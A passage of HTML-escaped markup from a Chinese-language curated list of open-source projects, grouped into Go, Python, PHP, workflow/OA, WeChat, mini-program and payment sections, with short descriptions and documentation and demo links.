    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/apache/incubator-answer&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;incubator-answer&lt;/a&gt; - 一款适合任何团队的问答平台软件。&lt;a href=&quot;https://answer.apache.org/zh-CN/docs/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/navidrome/navidrome&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;navidrome&lt;/a&gt; - 与 &lt;code&gt;Subsonic/Airsonic&lt;/code&gt; 兼容的现代音乐播放器。&lt;a href=&quot;https://www.navidrome.org/docs/installation/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt; &lt;a href=&quot;https://demo.navidrome.org/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/GopeedLab/gopeed&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;gopeed&lt;/a&gt; - 一款由 &lt;code&gt;Golang&lt;/code&gt; + &lt;code&gt;Flutter&lt;/code&gt; 开发的高速下载器，支持（HTTP、BitTorrent、Magnet）协议下载，并且支持全平台使用。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/alist-org/alist&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;alist&lt;/a&gt; - 一个支持多种存储的文件列表程序，使用 &lt;code&gt;Gin&lt;/code&gt; 和 &lt;code&gt;Solidjs&lt;/code&gt;。&lt;a href=&quot;https://al.nn.ci/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://alist.nn.ci/zh/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/mattermost/focalboard&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;focalboard&lt;/a&gt; - 一个开源的项目管理工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/crawlab-team/crawlab&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;crawlab&lt;/a&gt; - 分布式爬虫管理平台，支持任何语言和框架。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/eryajf/go-ldap-admin&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;go-ldap-admin&lt;/a&gt; - 基于 &lt;code&gt;Go&lt;/code&gt; + &lt;code&gt;Vue&lt;/code&gt; 实现的 &lt;code&gt;openLDAP&lt;/code&gt; 后台管理项目。&lt;a href=&quot;http://demo-go-ldap-admin.eryajf.net/#/login?redirect=%2Fdashboard&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;http://ldapdoc.eryajf.net/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/gohugoio/hugo&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;hugo&lt;/a&gt; - 一个用 &lt;code&gt;Go&lt;/code&gt; 语言构建的快速灵活的&lt;strong&gt;静态网站生成器&lt;/strong&gt;，旨在提供速度和灵活性。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/johnlui/DIYSearchEngine&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;DIYSearchEngine&lt;/a&gt; - &amp;nbsp;一个基于 &lt;code&gt;Go&lt;/code&gt; 开发的能够高速采集海量互联网数据的开源搜索引擎。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/zincsearch/zincsearch&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;zincsearch&lt;/a&gt; - 一个基于 &lt;code&gt;Go&lt;/code&gt; 开发的轻量的全文索引搜索引擎。&lt;a href=&quot;https://zincsearch-docs.zinc.dev/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/ProudMuBai/GoFilm&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;GoFilm&lt;/a&gt; - 一个基于 &lt;code&gt;Vue&lt;/code&gt; 和 &lt;code&gt;Gin&lt;/code&gt; 实现的在线观影网站。&lt;a href=&quot;http://1.94.30.26:3600/index&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/iyear/pure-live-core&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;pure-live-core&lt;/a&gt; - 一个想让直播回归纯粹的项目。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/antonmedv/fx&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;fx&lt;/a&gt; - 终端 &lt;code&gt;JSON&lt;/code&gt; 查看器和处理器。&lt;a href=&quot;https://fx.wtf/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/songquanpeng/go-file&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;go-file&lt;/a&gt; - 基于 &lt;code&gt;Go&lt;/code&gt; 的文件分享工具，仅单可执行文件，开箱即用，内置图床和视频播放页面。&lt;a href=&quot;https://go-file.onrender.com&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/yorukot/superfile&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;superfile&lt;/a&gt; - 一个现代终端文件管理器，为命令行文件操作提供了一个直观且漂亮的界面。
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;python-项目&quot;&gt;
    &lt;a href=&quot;?id=python-%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;python-项目&quot;&gt;&lt;code&gt;Python&lt;/code&gt; 项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/myhhub/stock&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;stock&lt;/a&gt; - &lt;strong&gt;股票系统&lt;/strong&gt;。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/x-hw/amazing-qr&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;amazing-qr&lt;/a&gt; - 二维码生成器（支持 &lt;code&gt;Gif&lt;/code&gt; 动态图片二维码）。
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;php-项目&quot;&gt;
    &lt;a href=&quot;?id=php-%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;php-项目&quot;&gt;&lt;code&gt;PHP&lt;/code&gt; 项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/zyx0814/dzzoffice&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;dzzoffice&lt;/a&gt; - 一套开源办公套件，包含网盘、文档、表格、演示文稿、图册等等。&lt;a href=&quot;http://demo.dzzoffice.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/assimon/dujiaoka&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;dujiaoka&lt;/a&gt; - 开源式站长自动化售货解决方案、高效、稳定、快速！
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/kuaifan/dootask&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;dootask&lt;/a&gt; - 一款轻量级的开源在线项目&lt;strong&gt;任务管理工具&lt;/strong&gt;，提供各类文档协作工具、在线思维导图、在线流程图、项目管理、任务分发、即时 &lt;code&gt;IM&lt;/code&gt;，文件管理等工具。&lt;a href=&quot;https://www.dootask.com/manage/dashboard&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/kalcaddle/kodbox&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;kodbox&lt;/a&gt; - &amp;nbsp;&lt;code&gt;Web&lt;/code&gt; 文件管理器。&lt;a href=&quot;https://demo.kodcloud.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;工作流oa项目&quot;&gt;
    &lt;a href=&quot;?id=%e5%b7%a5%e4%bd%9c%e6%b5%81oa%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;工作流oa项目&quot;&gt;工作流&lt;code&gt;OA&lt;/code&gt;项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/shenzhanwang/RuoYi-activiti&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;RuoYi-activiti&lt;/a&gt; - 基于 &lt;code&gt;Activiti 6.0&lt;/code&gt;，集流程设计、流程部署、流程执行、任务办理、流程监控于一体的开源工作流开发平台。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/agile-bpm/agile-bpm-basic&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;agile-bpm-basic&lt;/a&gt; - 基于 &lt;code&gt;JDK17&lt;/code&gt;、&lt;code&gt;Activiti7&lt;/code&gt;、&lt;code&gt;Vue3&lt;/code&gt;、&lt;code&gt;TS&lt;/code&gt;、&lt;code&gt;Vite&lt;/code&gt;、&lt;code&gt;ElementPlus&lt;/code&gt; 实现的工作流、低代码、快速开发平台。&lt;a href=&quot;http://demoa5.tongzhouyun.com/index&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;http://www.agilebpm.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/opencc/JFlow&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;JFlow&lt;/a&gt; - 适合中国国情的工作流引擎。&lt;a href=&quot;http://vue3.ccbpm.cn/#/WF/Comm/TreeEns?EnName=TreeEns_FlowSort2Flow&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/willianfu/jw-workflow-engine&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;jw-workflow-engine&lt;/a&gt; - &amp;nbsp;工作流设计器，自研表单及流程设计，&lt;code&gt;UI&lt;/code&gt; 简洁美观。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/lanyulei/ferry&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;ferry&lt;/a&gt; - 集工单统计、任务钩子、权限管理、灵活配置流程与模版等等于一身的开源工单系统。&lt;a href=&quot;http://fdevops.com:8001/#/dashboard&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/KonBAI-Q/RuoYi-Flowable-Plus&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;RuoYi-Flowable-Plus&lt;/a&gt; - 基于 &lt;code&gt;RuoYi-Vue-Plus&lt;/code&gt; 进行二次开发扩展 &lt;code&gt;Flowable&lt;/code&gt; 工作流功能，支持在线表单设计和丰富的工作流程设计能力。&lt;a href=&quot;http://159.75.158.189/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/junyue/cxygzl&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;cxygzl&lt;/a&gt; - 基于 &lt;code&gt;Flowable&lt;/code&gt; 的开箱即用的低代码开源专业工作流引擎。&lt;a href=&quot;https://www.cxygzl.com/guide/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/aizuda/flowlong&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;flowlong&lt;/a&gt; - 工作流引擎、&lt;code&gt;Json&lt;/code&gt; 格式实例模型、仿飞书钉钉审批流程设计器。&lt;a href=&quot;https://flowlong.gitee.io/flowlong-designer/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/aaluoxiang/oa_system&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;oa_system&lt;/a&gt; - 一个 &lt;code&gt;OA&lt;/code&gt; 办公自动化系统。&lt;a href=&quot;http://101.43.32.218:8088/index&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/glorylion/JFinalOA&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;JFinalOA&lt;/a&gt; - 基于 &lt;code&gt;JFinal&lt;/code&gt; 框架开发的企业办公系统。&lt;a href=&quot;http://admin.dianshixinxi.com:90/index&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;微信项目&quot;&gt;
    &lt;a href=&quot;?id=%e5%be%ae%e4%bf%a1%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;微信项目&quot;&gt;微信项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Wechat-Group/WxJava&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;WxJava&lt;/a&gt; - 微信开发 &lt;code&gt;Java SDK&lt;/code&gt;，支持包括微&lt;strong&gt;信支付，开放平台，小程序，企业微信，公众号&lt;/strong&gt;等的后端开发。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/binarywang/weixin-java-mp-demo&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;weixin-java-mp-demo&lt;/a&gt; - 基于 &lt;code&gt;Spring Boot&lt;/code&gt; 和 &lt;code&gt;WxJava&lt;/code&gt; 实现的&lt;strong&gt;微信公众号&lt;/strong&gt; &lt;code&gt;Java&lt;/code&gt; 后端 &lt;code&gt;Demo&lt;/code&gt;，支持多公众号。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/binarywang/weixin-java-miniapp-demo&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;weixin-java-miniapp-demo&lt;/a&gt; - 基于 &lt;code&gt;Spring Boot&lt;/code&gt; 和 &lt;code&gt;WxJava&lt;/code&gt; 实现的&lt;strong&gt;微信小程序&lt;/strong&gt; &lt;code&gt;Java&lt;/code&gt; 后端 &lt;code&gt;Demo&lt;/code&gt;。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/binarywang/weixin-java-pay-demo&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;weixin-java-pay-demo&lt;/a&gt; - 基于 &lt;code&gt;Spring Boot&lt;/code&gt; 和 &lt;code&gt;WxJava&lt;/code&gt; 实现的&lt;strong&gt;微信支付&lt;/strong&gt; &lt;code&gt;Java&lt;/code&gt; 后端 &lt;code&gt;Demo&lt;/code&gt;。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/niefy/wx-api&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;wx-api&lt;/a&gt; - 微信公众号管理系统，包含公众号菜单管理、自动回复、素材管理、模板消息、粉丝管理等功能，前后端都开源免费。
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;小程序项目&quot;&gt;
    &lt;a href=&quot;?id=%e5%b0%8f%e7%a8%8b%e5%ba%8f%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;小程序项目&quot;&gt;小程序项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/savingrun/WeHalo&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;WeHalo&lt;/a&gt; - 微信小程序版博客。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/iamxjb/winxin-app-watch-life.net&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;winxin-app-watch-life.net&lt;/a&gt; - 微慕 &lt;code&gt;WordPress&lt;/code&gt; 小程序开源版。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/NervJS/taro&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;taro&lt;/a&gt; - 开放式跨端跨框架解决方案，支持使用 &lt;code&gt;React/Vue/Nerv&lt;/code&gt; 等框架来开发微信/京东/百度/支付宝/字节跳动/ &lt;code&gt;QQ&lt;/code&gt; 小程序/&lt;code&gt;H5&lt;/code&gt;/&lt;code&gt;React Native&lt;/code&gt; 等应用。&lt;a href=&quot;https://docs.taro.zone/docs/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Kujiale-Mobile/Painter&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Painter&lt;/a&gt; - 小程序生成图片库，轻松通过 &lt;code&gt;Json&lt;/code&gt; 方式绘制一张可以发到朋友圈的图片。&lt;a href=&quot;https://painterjs.github.io/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/sesine/wechat-weapp-movie&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;wechat-weapp-movie&lt;/a&gt; - 电影推荐微信小程序。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/realyao/WXminiprogram-Focus-clock&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;WXminiprogram-Focus-clock&lt;/a&gt; - 微信小程序【专注时钟】。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/iamdarcy/hioshop-miniprogram&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;hioshop-miniprogram&lt;/a&gt; - 微信小程序商城，开源免费商用，海风小店。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/vincenth520/pinche_xcx&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;pinche_xcx&lt;/a&gt; - &lt;strong&gt;同城拼车&lt;/strong&gt;微信小程序。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/imageslr/weapp-library&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;weapp-library&lt;/a&gt; - &lt;strong&gt;在线借书平台&lt;/strong&gt;微信小程序。&lt;a href=&quot;https://imageslr.github.io/weapp-library/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/kesixin/QuestionWechatApp&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;QuestionWechatApp&lt;/a&gt; - 微信小程序，考试小程序，答题小程序，刷题小程序。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/danbaixi/yunxiaozhi&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;yunxiaozhi&lt;/a&gt; - 一款全面的&lt;strong&gt;校园教务查询微信小程序&lt;/strong&gt;。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/landalfyao/ddrun&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;ddrun&lt;/a&gt; - 一套&lt;strong&gt;跑腿下单接单&lt;/strong&gt;系统。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/guchengwuyue/yshop-drink&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;yshop-drink&lt;/a&gt; - 一个&lt;strong&gt;在线点餐&lt;/strong&gt;小程序，支持多门店模式，&lt;code&gt;SaaS&lt;/code&gt; 多租户模式。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/kevin_chou/qdpz&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;qdpz&lt;/a&gt; - 一个常用小程序功能的集合，基于 &lt;code&gt;Vue&lt;/code&gt; 实现，使用 &lt;code&gt;colorUi&lt;/code&gt; 与 &lt;code&gt;uView&lt;/code&gt;，完美支持微信小程序。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/virus010101/linfeng-community&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;linfeng-community&lt;/a&gt; - 一个基于 &lt;code&gt;SpringBoot&lt;/code&gt;、&lt;code&gt;MybatisPlus&lt;/code&gt;、&lt;code&gt;Redis&lt;/code&gt;、&lt;code&gt;Vue&lt;/code&gt;、&lt;code&gt;Uniapp&lt;/code&gt; 的前后端分离的&lt;strong&gt;社交论坛问答发帖&lt;/strong&gt;/&lt;code&gt;BBS&lt;/code&gt;，&lt;code&gt;SNS&lt;/code&gt; 项目。&lt;a href=&quot;https://www.kancloud.cn/linfengkj/linfeng_community/2754703&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;支付项目&quot;&gt;
    &lt;a href=&quot;?id=%e6%94%af%e4%bb%98%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;支付项目&quot;&gt;支付项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/roncoo/roncoo-pay&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;roncoo-pay&lt;/a&gt; - 开源的互联网&lt;strong&gt;支付系统&lt;/strong&gt;，拥有独立的账户体系、用户体系、支付接入体系、支付交易体系、对账清结算体系。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/jeequan/jeepay&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;jeepay&lt;/a&gt; - &lt;code&gt;Jeepay&lt;/code&gt; 是一套适合互联网企业使用的&lt;strong&gt;开源支付系统&lt;/strong&gt;，支持多渠道服务商和普通商户模式。已对接微信支付，支付宝，云闪付官方接口，支持聚合码支付。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Exrick/xpay&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;xpay&lt;/a&gt; - 个人免签收款支付系统。完全免费，资金直接到达本人账号，支持支付宝/微信/QQ/云闪付，无需备案，无需签约，无需挂机监控APP，无需插件，无需第三方支付 &lt;code&gt;SDK&lt;/code&gt;，无需营业执照身份证，只需收款码，搞定支付流程，现已支持移动端支付。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Javen205/IJPay&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;IJPay&lt;/a&gt; - 让支付触手可及，封装了微信支付、&lt;code&gt;QQ&lt;/code&gt; 支付、支付宝支付、京东支付、银联支付、&lt;code&gt;PayPal&lt;/code&gt; 支付等常用的支付方式以及各种常用的接口。&lt;a href=&quot;https://javen205.gitee.io/ijpay/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/dromara/dax-pay&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;dax-pay&lt;/a&gt; - 免费开源的支付网关，支持支付宝、微信、云闪付等通道。&lt;a href=&quot;https://daxpay.demo.bootx.cn/#/dashboard/analysis&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/dromara/payment-spring-boot&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;payment-spring-boot&lt;/a&gt; - 微信支付、&lt;code&gt;V3&lt;/code&gt; 支付 &lt;code&gt;Spring Boot Starter&lt;/code&gt;.
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;api-网关项目&quot;&gt;
    &lt;a href=&quot;?id=api-%e7%bd%91%e5%85%b3%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;api-网关项目&quot;&gt;&lt;code&gt;Api&lt;/code&gt; 网关项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
